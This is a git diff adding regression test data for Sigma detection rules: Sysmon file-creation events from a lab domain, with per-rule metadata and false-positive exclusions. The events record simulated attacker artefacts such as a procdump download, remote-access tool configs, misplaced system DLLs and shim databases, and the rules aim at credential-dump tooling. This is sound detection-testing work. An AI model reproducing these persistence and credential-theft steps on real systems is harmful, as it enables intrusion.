diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index 8da643d5e..7d1ae95bc 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -70,4 +70,6 @@ ef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.* 65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval) de587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\Discord\\ 24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\.exe +8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\.exe +c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.* dcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr diff --git a/.github/workflows/regression-tests.yml b/.github/workflows/regression-tests.yml new file mode 100644 index 000000000..ff56eb9e8 --- /dev/null +++ b/.github/workflows/regression-tests.yml @@ -0,0 +1,31 @@ +name: Regression Tests + +on: [push, pull_request, workflow_dispatch] + +env: + EVTX_BASELINE_VERSION: v0.8.2 + +jobs: + true-positive-tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + + - name: Set up Python + uses: actions/setup-python@v6 + with: + python-version: '3.11' + + - name: Install Python dependencies + run: | + python -m pip install --upgrade pip + pip install pyyaml + + - name: Download evtx-sigma-checker + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + chmod +x evtx-sigma-checker + + - name: Run regression tests + run: | + python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx new file mode 100644 index 000000000..21fd14fbb Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json new file mode 100644 index 000000000..8e4e9362e --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:36:29.111126Z" + } + }, + "EventRecordID": 18267, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:36:29.110", + "ProcessGuid": "5AA13A44-0D74-68FC-EB1D-000000004002", + "ProcessId": 5624, + "Image": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\is-3C3LU.tmp\\Advanced_IP_Scanner_2.5.4594.1(1).tmp", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Advanced IP Scanner 2\\platforms\\qwindows.dll", + "CreationUtcTime": "2025-10-24 10:44:35.897", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..1485a4dc0 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml @@ -0,0 +1,13 @@ +id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fed85bf9-e075-4280-9159-fbe8a023d6fa + title: Advanced IP Scanner - File Event +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx new file mode 100644 index 000000000..064b8b657 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json new file mode 100644 index 000000000..0ead262af --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json @@ -0,0 +1,255 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.640670Z" + } + }, + "EventRecordID": 14961, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.457", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.644616Z" + } + }, + "EventRecordID": 14963, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf~RF2d9c1fe.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.634", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.649129Z" + } + }, + "EventRecordID": 14985, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.653476Z" + } + }, + "EventRecordID": 14988, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf~RF2d9c20d.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.645", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.655191Z" + } + }, + "EventRecordID": 14990, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml new file mode 100644 index 000000000..b0fd7e356 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml @@ -0,0 +1,13 @@ +id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0b9ad457-2554-44c1-82c2-d56a99c42377 + title: Anydesk Temporary Artefact +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx new file mode 100644 index 000000000..a8f65532b Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json new file mode 100644 index 000000000..2285fa237 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:36:53.996168Z" + } + }, + "EventRecordID": 19025, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:36:53.977", + "ProcessGuid": "5AA13A44-523E-68FB-1700-000000004002", + "ProcessId": 1276, + "Image": "C:\\Windows\\System32\\svchost.exe", + "TargetFilename": "C:\\Users\\Administrator\\Documents\\fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx", + "CreationUtcTime": "2025-10-24 23:36:52.320", + "User": "NT AUTHORITY\\LOCAL SERVICE" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml new file mode 100644 index 000000000..f3e1a4220 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml @@ -0,0 +1,13 @@ +id: afb1a75a-79c0-451e-b2dc-cb14fdc0e7ef +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb + title: EVTX Created In Uncommon Location +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx new file mode 100644 index 000000000..05d7d921b Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json new file mode 100644 index 000000000..e1a6beffc --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:38:31.938519Z" + } + }, + "EventRecordID": 20972, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:38:31.936", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Windows\\System32\\WLBSCTRL.dll", + "CreationUtcTime": "2025-10-24 23:38:31.936", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml new file mode 100644 index 000000000..9af8facb1 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml @@ -0,0 +1,13 @@ +id: 8da08693-5638-4236-87b1-d04b4fcc5e84 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df6ecb8b-7822-4f4b-b412-08f524b4576c + title: Creation Of Non-Existent System DLL +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx new file mode 100644 index 000000000..e758a71f3 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json new file mode 100644 index 000000000..a169ce960 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:39:53.705006Z" + } + }, + "EventRecordID": 22566, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:39:53.699", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Windows\\apppatch\\CustomSDB\\my_custom.sdb", + "CreationUtcTime": "2025-10-24 23:39:53.699", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml new file mode 100644 index 000000000..7c66c836a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml @@ -0,0 +1,13 @@ +id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ee63c85c-6d51-4d12-ad09-04e25877a947 + title: New Custom Shim Database Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx new file mode 100644 index 000000000..d4e9307b5 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json new file mode 100644 index 000000000..53d3796c2 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:00.601559Z" + } + }, + "EventRecordID": 23503, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:00.589", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\tdh.dll", + "CreationUtcTime": "2025-10-24 23:41:00.589", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml new file mode 100644 index 000000000..3039b03b8 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml @@ -0,0 +1,13 @@ +id: 61017761-38ab-4224-a43f-6cc53b67e374 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e + title: Files With System DLL Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx new file mode 100644 index 000000000..074dcff33 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json new file mode 100644 index 000000000..75ad05708 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:48.497170Z" + } + }, + "EventRecordID": 24322, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:48.482", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\bitsadmin.exe", + "CreationUtcTime": "2025-10-24 23:41:48.482", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml new file mode 100644 index 000000000..858e84b3a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml @@ -0,0 +1,13 @@ +id: e0123384-7d25-4178-b011-c1d37394d8dc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d + title: Files With System Process Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx new file mode 100644 index 000000000..b1b8d69f5 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json new file mode 100644 index 000000000..c5be894a5 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json @@ -0,0 +1,306 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.136421Z" + } + }, + "EventRecordID": 26359, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.134", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe", + "CreationUtcTime": "2025-10-24 23:43:34.134", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + 